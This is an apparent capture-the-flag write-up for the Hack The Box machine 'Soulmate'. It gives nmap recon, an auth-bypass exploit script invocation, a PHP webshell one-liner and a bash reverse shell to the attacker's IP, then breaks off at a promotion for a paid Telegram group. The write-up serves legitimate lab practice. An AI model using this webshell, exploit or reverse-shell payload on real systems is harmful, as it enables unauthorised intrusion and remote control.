Soulmate — Hack The Box
Platform: Linux
IP: 10.129.229.162
Difficulty: Easy
Author: NoSec
wanna go deeper? unlock short videos & early root chains by joining backdoor crew
💀 join the backdoor crewEditing /etc/hosts
sudo sh -c '10.129.229.162 soulmate.htb ftp.soulmate.htb" >> /etc/hosts'
Recon – Service enumeration
Nmap
nmap -sVC soulmate.htb
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Soulmate - Find Your Perfect Match
|_http-server-header: nginx/1.18.0 (Ubuntu)
Foothold – Web vuln → RCE
A new vhost was discovered: ftp.soulmate.htb
This was vulnerable to CVE-2025-31161 (auth bypass).
We can create a new admin user:
python3 cve-2025-31161.py \
--target_host ftp.soulmate.htb \
--port 80 \
--target_user admin \
--new_user nosec \
--password 'Crush@123!'
On the admin panel, uploaded .png files can be renamed to .php → classic webshell upload.
Webshell upload
echo '<?php if(isset($_REQUEST["cmd"])) system($_REQUEST["cmd"]); ?>' > shell.png
Upload → rename → shell.php.
Test:
http://soulmate.htb/assets/images/profiles/shell.php?cmd=id
Reverse shell
rlwrap nc -lvnp 9001
curl "http://soulmate.htb/assets/images/profiles/shell.php?cmd=bash%20-c%20'bash%20-i%20%3E%26%20/dev/tcp/10.10.14.81/9001%200%3E%261'"
✅ www-data shell obtained.
🔐 Root part is only available in the private Telegram group while the box is active in Season 8. 👉 Join for the full writeup, extra tips and exclusive content: 📡 https://t.me/nosecpwn
☕ invite me for a coffee so i don’t fall asleep writing the next writeup
💻 support nosec